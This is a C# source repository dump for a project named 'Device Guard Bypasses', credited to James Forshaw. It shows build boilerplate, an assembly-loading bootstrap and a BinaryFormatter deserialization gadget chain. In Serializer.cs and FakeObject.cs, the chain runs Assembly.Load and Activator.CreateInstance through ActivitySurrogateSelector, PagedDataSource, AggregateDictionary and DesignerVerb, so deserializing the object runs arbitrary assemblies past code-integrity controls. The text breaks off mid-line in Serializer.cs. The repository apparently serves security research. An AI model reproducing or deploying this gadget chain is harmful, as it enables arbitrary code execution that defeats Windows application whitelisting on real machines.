├── .gitattributes
├── .gitignore
├── AUTHORS
├── Bootstrap
├── AssemblyResolver.cs
├── Bootstrap.csproj
├── EntryPoint.cs
└── Properties
│ └── AssemblyInfo.cs
├── CommonLib
├── CommonLib.csproj
├── FakeObject.cs
├── ObjectSurrogateSelector.cs
├── Properties
│ └── AssemblyInfo.cs
└── Serializer.cs
├── CreateAddInIpcData
├── App.config
├── CreateAddInIpcData.csproj
├── Program.cs
├── Properties
│ ├── AssemblyInfo.cs
│ ├── Resources.Designer.cs
│ └── Resources.resx
└── Resources
│ └── Template.txt
├── CreateInstallState
├── App.config
├── CreateInstallState.csproj
├── Program.cs
└── Properties
│ └── AssemblyInfo.cs
├── DeviceGuardBypasses.sln
├── ExampleAsm
├── EntryPoint.cs
├── ExampleAsm.csproj
└── Properties
│ └── AssemblyInfo.cs
├── LICENSE
├── README
└── RunPowershell
├── App.config
├── Program.cs
├── Properties
└── AssemblyInfo.cs
└── RunPowershell.csproj
/.gitattributes:
--------------------------------------------------------------------------------
1 | ###############################################################################
2 | # Set default behavior to automatically normalize line endings.
3 | ###############################################################################
4 | * text=auto
5 |
6 | ###############################################################################
7 | # Set default behavior for command prompt diff.
8 | #
9 | # This is need for earlier builds of msysgit that does not have it on by
10 | # default for csharp files.
11 | # Note: This is only used by command line
12 | ###############################################################################
13 | #*.cs diff=csharp
14 |
15 | ###############################################################################
16 | # Set the merge driver for project and solution files
17 | #
18 | # Merging from the command prompt will add diff markers to the files if there
19 | # are conflicts (Merging from VS is not affected by the settings below, in VS
20 | # the diff markers are never inserted). Diff markers may cause the following
21 | # file extensions to fail to load in VS. An alternative would be to treat
22 | # these files as binary and thus will always conflict and require user
23 | # intervention with every merge. To do so, just uncomment the entries below
24 | ###############################################################################
25 | #*.sln merge=binary
26 | #*.csproj merge=binary
27 | #*.vbproj merge=binary
28 | #*.vcxproj merge=binary
29 | #*.vcproj merge=binary
30 | #*.dbproj merge=binary
31 | #*.fsproj merge=binary
32 | #*.lsproj merge=binary
33 | #*.wixproj merge=binary
34 | #*.modelproj merge=binary
35 | #*.sqlproj merge=binary
36 | #*.wwaproj merge=binary
37 |
38 | ###############################################################################
39 | # behavior for image files
40 | #
41 | # image files are treated as binary by default.
42 | ###############################################################################
43 | #*.jpg binary
44 | #*.png binary
45 | #*.gif binary
46 |
47 | ###############################################################################
48 | # diff behavior for common document formats
49 | #
50 | # Convert binary document formats to text before diffing them. This feature
51 | # is only available from the command line. Turn it on by uncommenting the
52 | # entries below.
53 | ###############################################################################
54 | #*.doc diff=astextplain
55 | #*.DOC diff=astextplain
56 | #*.docx diff=astextplain
57 | #*.DOCX diff=astextplain
58 | #*.dot diff=astextplain
59 | #*.DOT diff=astextplain
60 | #*.pdf diff=astextplain
61 | #*.PDF diff=astextplain
62 | #*.rtf diff=astextplain
63 | #*.RTF diff=astextplain
64 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 |
4 | # User-specific files
5 | *.suo
6 | *.user
7 | *.userosscache
8 | *.sln.docstates
9 |
10 | # User-specific files (MonoDevelop/Xamarin Studio)
11 | *.userprefs
12 |
13 | # Build results
14 | [Dd]ebug/
15 | [Dd]ebugPublic/
16 | [Rr]elease/
17 | [Rr]eleases/
18 | [Xx]64/
19 | [Xx]86/
20 | [Bb]uild/
21 | bld/
22 | [Bb]in/
23 | [Oo]bj/
24 |
25 | # Visual Studio 2015 cache/options directory
26 | .vs/
27 | # Uncomment if you have tasks that create the project's static files in wwwroot
28 | #wwwroot/
29 |
30 | # MSTest test Results
31 | [Tt]est[Rr]esult*/
32 | [Bb]uild[Ll]og.*
33 |
34 | # NUNIT
35 | *.VisualState.xml
36 | TestResult.xml
37 |
38 | # Build Results of an ATL Project
39 | [Dd]ebugPS/
40 | [Rr]eleasePS/
41 | dlldata.c
42 |
43 | # DNX
44 | project.lock.json
45 | artifacts/
46 |
47 | *_i.c
48 | *_p.c
49 | *_i.h
50 | *.ilk
51 | *.meta
52 | *.obj
53 | *.pch
54 | *.pdb
55 | *.pgc
56 | *.pgd
57 | *.rsp
58 | *.sbr
59 | *.tlb
60 | *.tli
61 | *.tlh
62 | *.tmp
63 | *.tmp_proj
64 | *.log
65 | *.vspscc
66 | *.vssscc
67 | .builds
68 | *.pidb
69 | *.svclog
70 | *.scc
71 |
72 | # Chutzpah Test files
73 | _Chutzpah*
74 |
75 | # Visual C++ cache files
76 | ipch/
77 | *.aps
78 | *.ncb
79 | *.opendb
80 | *.opensdf
81 | *.sdf
82 | *.cachefile
83 | *.VC.db
84 |
85 | # Visual Studio profiler
86 | *.psess
87 | *.vsp
88 | *.vspx
89 | *.sap
90 |
91 | # TFS 2012 Local Workspace
92 | $tf/
93 |
94 | # Guidance Automation Toolkit
95 | *.gpState
96 |
97 | # ReSharper is a .NET coding add-in
98 | _ReSharper*/
99 | *.[Rr]e[Ss]harper
100 | *.DotSettings.user
101 |
102 | # JustCode is a .NET coding add-in
103 | .JustCode
104 |
105 | # TeamCity is a build add-in
106 | _TeamCity*
107 |
108 | # DotCover is a Code Coverage Tool
109 | *.dotCover
110 |
111 | # NCrunch
112 | _NCrunch_*
113 | .*crunch*.local.xml
114 | nCrunchTemp_*
115 |
116 | # MightyMoose
117 | *.mm.*
118 | AutoTest.Net/
119 |
120 | # Web workbench (sass)
121 | .sass-cache/
122 |
123 | # Installshield output folder
124 | [Ee]xpress/
125 |
126 | # DocProject is a documentation generator add-in
127 | DocProject/buildhelp/
128 | DocProject/Help/*.HxT
129 | DocProject/Help/*.HxC
130 | DocProject/Help/*.hhc
131 | DocProject/Help/*.hhk
132 | DocProject/Help/*.hhp
133 | DocProject/Help/Html2
134 | DocProject/Help/html
135 |
136 | # Click-Once directory
137 | publish/
138 |
139 | # Publish Web Output
140 | *.[Pp]ublish.xml
141 | *.azurePubxml
142 |
143 | # TODO: Un-comment the next line if you do not want to checkin
144 | # your web deploy settings because they may include unencrypted
145 | # passwords
146 | #*.pubxml
147 | *.publishproj
148 |
149 | # NuGet Packages
150 | *.nupkg
151 | # The packages folder can be ignored because of Package Restore
152 | **/packages/*
153 | # except build/, which is used as an MSBuild target.
154 | !**/packages/build/
155 | # Uncomment if necessary however generally it will be regenerated when needed
156 | #!**/packages/repositories.config
157 | # NuGet v3's project.json files produces more ignoreable files
158 | *.nuget.props
159 | *.nuget.targets
160 |
161 | # Microsoft Azure Build Output
162 | csx/
163 | *.build.csdef
164 |
165 | # Microsoft Azure Emulator
166 | ecf/
167 | rcf/
168 |
169 | # Microsoft Azure ApplicationInsights config file
170 | ApplicationInsights.config
171 |
172 | # Windows Store app package directory
173 | AppPackages/
174 | BundleArtifacts/
175 |
176 | # Visual Studio cache files
177 | # files ending in .cache can be ignored
178 | *.[Cc]ache
179 | # but keep track of directories ending in .cache
180 | !*.[Cc]ache/
181 |
182 | # Others
183 | ClientBin/
184 | [Ss]tyle[Cc]op.*
185 | ~$*
186 | *~
187 | *.dbmdl
188 | *.dbproj.schemaview
189 | *.pfx
190 | *.publishsettings
191 | node_modules/
192 | orleans.codegen.cs
193 |
194 | # RIA/Silverlight projects
195 | Generated_Code/
196 |
197 | # Backup & report files from converting an old project file
198 | # to a newer Visual Studio version. Backup files are not needed,
199 | # because we have git ;-)
200 | _UpgradeReport_Files/
201 | Backup*/
202 | UpgradeLog*.XML
203 | UpgradeLog*.htm
204 |
205 | # SQL Server files
206 | *.mdf
207 | *.ldf
208 |
209 | # Business Intelligence projects
210 | *.rdl.data
211 | *.bim.layout
212 | *.bim_*.settings
213 |
214 | # Microsoft Fakes
215 | FakesAssemblies/
216 |
217 | # GhostDoc plugin setting file
218 | *.GhostDoc.xml
219 |
220 | # Node.js Tools for Visual Studio
221 | .ntvs_analysis.dat
222 |
223 | # Visual Studio 6 build log
224 | *.plg
225 |
226 | # Visual Studio 6 workspace options file
227 | *.opt
228 |
229 | # Visual Studio LightSwitch build output
230 | **/*.HTMLClient/GeneratedArtifacts
231 | **/*.DesktopClient/GeneratedArtifacts
232 | **/*.DesktopClient/ModelManifest.xml
233 | **/*.Server/GeneratedArtifacts
234 | **/*.Server/ModelManifest.xml
235 | _Pvt_Extensions
236 |
237 | # LightSwitch generated files
238 | GeneratedArtifacts/
239 | ModelManifest.xml
240 |
241 | # Paket dependency manager
242 | .paket/paket.exe
243 |
244 | # FAKE - F# Make
245 | .fake/
--------------------------------------------------------------------------------
/AUTHORS:
--------------------------------------------------------------------------------
1 | James Forshaw
--------------------------------------------------------------------------------
/Bootstrap/AssemblyResolver.cs:
--------------------------------------------------------------------------------
1 | // This file is part of Device Guard Bypasses
2 | //
3 | // Device Guard Bypasses is free software: you can redistribute it
4 | // and/or modify it under the terms of the GNU General Public License
5 | // as published by the Free Software Foundation, either version 3 of
6 | // the License, or (at your option) any later version.
7 | //
8 | // Foobar is distributed in the hope that it will be useful,
9 | // but WITHOUT ANY WARRANTY; without even the implied warranty of
10 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.See the
11 | // GNU General Public License for more details.
12 | //
13 | // You should have received a copy of the GNU General Public License
14 | // along with Device Guard Bypasses. If not, see.
15 |
16 | using System;
17 | using System.Collections.Generic;
18 | using System.IO;
19 | using System.Linq;
20 | using System.Reflection;
21 |
22 | namespace Bootstrap
23 | {
24 | class AssemblyResolver
25 | {
26 | private Dictionary _resolved_asms =
27 | new Dictionary(StringComparer.OrdinalIgnoreCase);
28 |
29 | private HashSet _resolver_paths =
30 | new HashSet(StringComparer.OrdinalIgnoreCase);
31 |
32 | private bool _trace_enabled;
33 |
34 | public bool TraceEnabled
35 | {
36 | get
37 | {
38 | return _trace_enabled;
39 | }
40 |
41 | set
42 | {
43 | _trace_enabled = value;
44 | }
45 | }
46 |
47 | private void Trace(string str)
48 | {
49 | if (_trace_enabled)
50 | {
51 | Console.WriteLine(str);
52 | }
53 | }
54 |
55 | private void Trace(string fmt, params object[] objs)
56 | {
57 | Trace(String.Format(fmt, objs));
58 | }
59 |
60 | internal void ResetCache()
61 | {
62 | _resolved_asms.Clear();
63 | Assembly asm = typeof(EntryPoint).Assembly;
64 | _resolved_asms["bootstrap"] = asm;
65 | _resolved_asms[asm.FullName] = asm;
66 | }
67 |
68 | internal void ResetMissingCache()
69 | {
70 | foreach (var pair in _resolved_asms.ToArray())
71 | {
72 | if (pair.Value == null)
73 | {
74 | _resolved_asms.Remove(pair.Key);
75 | }
76 | }
77 | }
78 |
79 | internal AssemblyResolver()
80 | {
81 | ResetCache();
82 | // Get list of assembly paths from environment if ASSEMBLY_PATH exists.
83 | string asm_path = Environment.GetEnvironmentVariable("ASSEMBLY_PATH");
84 | if (!String.IsNullOrWhiteSpace(asm_path))
85 | {
86 | foreach (string path in asm_path.Split(new[] { ';' }, StringSplitOptions.RemoveEmptyEntries))
87 | {
88 | _resolver_paths.Add(Path.GetFullPath(path));
89 | }
90 | }
91 | else
92 | {
93 | // Default to Documents\assembly
94 | _resolver_paths.Add(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments), "assembly"));
95 | }
96 |
97 | // Setup resolver.
98 | AppDomain.CurrentDomain.AssemblyResolve += CurrentDomain_AssemblyResolve;
99 | }
100 |
101 | internal void AddAssemblyPath(string path)
102 | {
103 | _resolver_paths.Add(Path.GetFullPath(path));
104 | }
105 |
106 | private string FindAssemblyPath(AssemblyName name, string extension)
107 | {
108 | foreach (string path in
109 | _resolver_paths.Select(p =>
110 | Path.ChangeExtension(Path.Combine(p, name.Name), extension)))
111 | {
112 | Trace("Checking {0}", path);
113 | if (File.Exists(path))
114 | {
115 | return path;
116 | }
117 | }
118 | return null;
119 | }
120 |
121 | private Assembly CurrentDomain_AssemblyResolve(object sender, ResolveEventArgs args)
122 | {
123 | Trace("Looking up {0}", args.Name);
124 | if (!_resolved_asms.ContainsKey(args.Name))
125 | {
126 | AssemblyName name = new AssemblyName(args.Name);
127 | string path = FindAssemblyPath(name, ".exe") ?? FindAssemblyPath(name, ".dll");
128 | if (path != null)
129 | {
130 | Assembly asm = Assembly.Load(File.ReadAllBytes(path));
131 | _resolved_asms[args.Name] = asm;
132 | _resolved_asms[asm.FullName] = asm;
133 | }
134 | else
135 | {
136 | _resolved_asms[args.Name] = null;
137 | }
138 | }
139 |
140 | return _resolved_asms[args.Name];
141 | }
142 |
143 | }
144 | }
145 |
--------------------------------------------------------------------------------
/Bootstrap/Bootstrap.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {3705800F-1424-465B-937D-586E3A622A4F}
8 | Exe
9 | Properties
10 | Bootstrap
11 | Bootstrap
12 | v4.5.2
13 | 512
14 |
15 |
16 | true
17 | full
18 | false
19 | bin\Debug\
20 | DEBUG;TRACE
21 | prompt
22 | 4
23 |
24 |
25 | pdbonly
26 | true
27 | bin\Release\
28 | TRACE
29 | prompt
30 | 4
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
58 |
--------------------------------------------------------------------------------
/Bootstrap/EntryPoint.cs:
--------------------------------------------------------------------------------
1 | // This file is part of Device Guard Bypasses
2 | //
3 | // Device Guard Bypasses is free software: you can redistribute it
4 | // and/or modify it under the terms of the GNU General Public License
5 | // as published by the Free Software Foundation, either version 3 of
6 | // the License, or (at your option) any later version.
7 | //
8 | // Foobar is distributed in the hope that it will be useful,
9 | // but WITHOUT ANY WARRANTY; without even the implied warranty of
10 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.See the
11 | // GNU General Public License for more details.
12 | //
13 | // You should have received a copy of the GNU General Public License
14 | // along with Device Guard Bypasses. If not, see..
15 |
16 | using System;
17 | using System.IO;
18 | using System.Threading;
19 |
20 | namespace Bootstrap
21 | {
22 | public class EntryPoint
23 | {
24 | private static AssemblyResolver _main_resolver = new AssemblyResolver();
25 |
26 | static void MainThread(object resolver)
27 | {
28 | try
29 | {
30 | AppDomain.CurrentDomain.ExecuteAssemblyByName("startasm");
31 | }
32 | catch (Exception ex)
33 | {
34 | Console.WriteLine(ex);
35 | }
36 | }
37 |
38 | public EntryPoint()
39 | {
40 | // Execute the assembly named startasm.
41 | Thread thread = new Thread(MainThread);
42 | thread.Start(_main_resolver);
43 | thread.Join();
44 | }
45 |
46 | ///
47 | /// Add a path to the assembly lookup
48 | ///
49 | /// The path for lookup
50 | public static void AddAssemblyPath(string path)
51 | {
52 | _main_resolver.AddAssemblyPath(Path.GetFullPath(path));
53 | }
54 |
55 | ///
56 | /// Reset entire cache.
57 | ///
58 | public static void ResetCache()
59 | {
60 | _main_resolver.ResetCache();
61 | }
62 |
63 | ///
64 | /// Reset cache to remove any assemblies which weren't found.
65 | ///
66 | public static void ResetMissingCache()
67 | {
68 | _main_resolver.ResetMissingCache();
69 | }
70 |
71 | public static bool TraceEnabled
72 | {
73 | get
74 | {
75 | return _main_resolver.TraceEnabled;
76 | }
77 | set
78 | {
79 | _main_resolver.TraceEnabled = value;
80 | }
81 | }
82 |
83 | ///
84 | /// Entrypoint for testing.
85 | ///
86 | static void Main()
87 | {
88 | try
89 | {
90 | EntryPoint ep = new EntryPoint();
91 | }
92 | catch (Exception ex)
93 | {
94 | Console.WriteLine(ex);
95 | }
96 | }
97 | }
98 | }
99 |
--------------------------------------------------------------------------------
/Bootstrap/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("Bootstrap")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("Bootstrap")]
13 | [assembly: AssemblyCopyright("Copyright © 2017")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("3705800f-1424-465b-937d-586e3a622a4f")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/CommonLib/CommonLib.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {4E6CEEA1-F266-401C-B832-F91432D46F42}
8 | Library
9 | Properties
10 | CommonLib
11 | CommonLib
12 | v4.5
13 | 512
14 |
15 |
16 | true
17 | full
18 | false
19 | bin\Debug\
20 | DEBUG;TRACE
21 | prompt
22 | 4
23 |
24 |
25 | pdbonly
26 | true
27 | bin\Release\
28 | TRACE
29 | prompt
30 | 4
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
58 |
--------------------------------------------------------------------------------
/CommonLib/FakeObject.cs:
--------------------------------------------------------------------------------
1 | // This file is part of Device Guard Bypasses
2 | //
3 | // Device Guard Bypasses is free software: you can redistribute it
4 | // and/or modify it under the terms of the GNU General Public License
5 | // as published by the Free Software Foundation, either version 3 of
6 | // the License, or (at your option) any later version.
7 | //
8 | // Foobar is distributed in the hope that it will be useful,
9 | // but WITHOUT ANY WARRANTY; without even the implied warranty of
10 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.See the
11 | // GNU General Public License for more details.
12 | //
13 | // You should have received a copy of the GNU General Public License
14 | // along with Device Guard Bypasses. If not, see.
15 |
16 | using System;
17 | using System.IO;
18 | using System.Runtime.Serialization;
19 | using System.Runtime.Serialization.Formatters.Binary;
20 | using System.Web.Security;
21 |
22 | namespace CommonLib
23 | {
24 | [Serializable]
25 | public class WrappedAssemblyObject : ISerializable
26 | {
27 | public byte[] _assembly;
28 |
29 | public WrappedAssemblyObject(string filename)
30 | {
31 | _assembly = File.ReadAllBytes(filename);
32 | }
33 |
34 | public void GetObjectData(SerializationInfo info, StreamingContext context)
35 | {
36 | BinaryFormatter fmt = new BinaryFormatter();
37 | MemoryStream stm = new MemoryStream();
38 | fmt.SurrogateSelector = new ObjectSurrogateSelector();
39 | fmt.Serialize(stm, Serializer.CreateAssemblyLoader(_assembly));
40 | info.SetType(typeof(RolePrincipal));
41 | info.AddValue("System.Security.ClaimsPrincipal.Identities", Convert.ToBase64String(stm.ToArray()));
42 | }
43 | }
44 |
45 | }
46 |
--------------------------------------------------------------------------------
/CommonLib/ObjectSurrogateSelector.cs:
--------------------------------------------------------------------------------
1 | // This file is part of Device Guard Bypasses
2 | //
3 | // Device Guard Bypasses is free software: you can redistribute it
4 | // and/or modify it under the terms of the GNU General Public License
5 | // as published by the Free Software Foundation, either version 3 of
6 | // the License, or (at your option) any later version.
7 | //
8 | // Foobar is distributed in the hope that it will be useful,
9 | // but WITHOUT ANY WARRANTY; without even the implied warranty of
10 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.See the
11 | // GNU General Public License for more details.
12 | //
13 | // You should have received a copy of the GNU General Public License
14 | // along with Device Guard Bypasses. If not, see.
15 |
16 | using System;
17 | using System.Runtime.Serialization;
18 |
19 | namespace CommonLib
20 | {
21 | public class ObjectSurrogateSelector : SurrogateSelector
22 | {
23 | public override ISerializationSurrogate GetSurrogate(Type type, StreamingContext context, out ISurrogateSelector selector)
24 | {
25 | selector = this;
26 | if (!type.IsSerializable)
27 | {
28 | Type t = Type.GetType("System.Workflow.ComponentModel.Serialization.ActivitySurrogateSelector+ObjectSurrogate, System.Workflow.ComponentModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35");
29 | return (ISerializationSurrogate)Activator.CreateInstance(t);
30 | }
31 |
32 | return base.GetSurrogate(type, context, out selector);
33 | }
34 | }
35 | }
36 |
--------------------------------------------------------------------------------
/CommonLib/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.InteropServices;
3 |
4 | // General Information about an assembly is controlled through the following
5 | // set of attributes. Change these attribute values to modify the information
6 | // associated with an assembly.
7 | [assembly: AssemblyTitle("CommonLib")]
8 | [assembly: AssemblyDescription("")]
9 | [assembly: AssemblyConfiguration("")]
10 | [assembly: AssemblyCompany("")]
11 | [assembly: AssemblyProduct("CommonLib")]
12 | [assembly: AssemblyCopyright("Copyright © James Forshaw 2017")]
13 | [assembly: AssemblyTrademark("")]
14 | [assembly: AssemblyCulture("")]
15 |
16 | // Setting ComVisible to false makes the types in this assembly not visible
17 | // to COM components. If you need to access a type in this assembly from
18 | // COM, set the ComVisible attribute to true on that type.
19 | [assembly: ComVisible(false)]
20 |
21 | // The following GUID is for the ID of the typelib if this project is exposed to COM
22 | [assembly: Guid("4e6ceea1-f266-401c-b832-f91432d46f42")]
23 |
24 | // Version information for an assembly consists of the following four values:
25 | //
26 | // Major Version
27 | // Minor Version
28 | // Build Number
29 | // Revision
30 | //
31 | // You can specify all the values or you can default the Build and Revision Numbers
32 | // by using the '*' as shown below:
33 | // [assembly: AssemblyVersion("1.0.*")]
34 | [assembly: AssemblyVersion("1.0.0.0")]
35 | [assembly: AssemblyFileVersion("1.0.0.0")]
36 |
--------------------------------------------------------------------------------
/CommonLib/Serializer.cs:
--------------------------------------------------------------------------------
1 | // This file is part of Device Guard Bypasses
2 | //
3 | // Device Guard Bypasses is free software: you can redistribute it
4 | // and/or modify it under the terms of the GNU General Public License
5 | // as published by the Free Software Foundation, either version 3 of
6 | // the License, or (at your option) any later version.
7 | //
8 | // Foobar is distributed in the hope that it will be useful,
9 | // but WITHOUT ANY WARRANTY; without even the implied warranty of
10 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.See the
11 | // GNU General Public License for more details.
12 | //
13 | // You should have received a copy of the GNU General Public License
14 | // along with Device Guard Bypasses. If not, see.
15 |
16 | using System;
17 | using System.Collections;
18 | using System.Collections.Generic;
19 | using System.ComponentModel.Design;
20 | using System.IO;
21 | using System.Linq;
22 | using System.Reflection;
23 | using System.Runtime.Serialization;
24 | using System.Runtime.Serialization.Formatters.Binary;
25 | using System.Web.UI.WebControls;
26 | using System.Xml;
27 |
28 | namespace CommonLib
29 | {
30 | public class Serializer
31 | {
32 | static T CreateDelegate(MethodInfo mi)
33 | {
34 | return (T)(object)Delegate.CreateDelegate(typeof(T), mi);
35 | }
36 |
37 | static T CreateDelegate(Type type, string name)
38 | {
39 | return CreateDelegate(type.GetMethod(name));
40 | }
41 |
42 | static T CreateGetterDelegate(Type type, string name)
43 | {
44 | return CreateDelegate(type.GetProperty(name).GetMethod);
45 | }
46 |
47 | public static object CreateAssemblyLoader(byte[] assembly)
48 | {
49 | // Build a chain to map a byte array to creating an instance of a class.
50 | // byte[] -> Assembly.Load -> Assembly -> Assembly.GetType -> Type[] -> Activator.CreateInstance -> Win!
51 | byte[][] data = new byte[1][];
52 | data[0] = assembly;
53 | var e1 = data.Select(Assembly.Load);
54 | var map_type = CreateDelegate>>(typeof(Assembly), "GetTypes");
55 | var e2 = e1.SelectMany(map_type);
56 | var p = CreateGetterDelegate>(typeof(Type), "IsPublic");
57 | var e3 = e2.Where(p);
58 | var e4 = e3.Select(Activator.CreateInstance);
59 |
60 | // PagedDataSource maps an arbitrary IEnumerable to an ICollection
61 | PagedDataSource pds = new PagedDataSource() { DataSource = e4 };
62 | // AggregateDictionary maps an arbitrary ICollection to an IDictionary
63 | // Class is internal so need to use reflection.
64 | IDictionary dict = (IDictionary)Activator.CreateInstance(typeof(int).Assembly.GetType("System.Runtime.Remoting.Channels.AggregateDictionary"), pds);
65 |
66 | // DesignerVerb queries a value from an IDictionary when its ToString is called. This results in the linq enumerator being walked.
67 | DesignerVerb verb = new DesignerVerb("XYZ", null);
68 | // Need to insert IDictionary using reflection.
69 | typeof(MenuCommand).GetField("properties", BindingFlags.NonPublic | BindingFlags.Instance).SetValue(verb, dict);
70 |
71 | // Pre-load objects, this ensures they're fixed up before building the hash table.
72 | List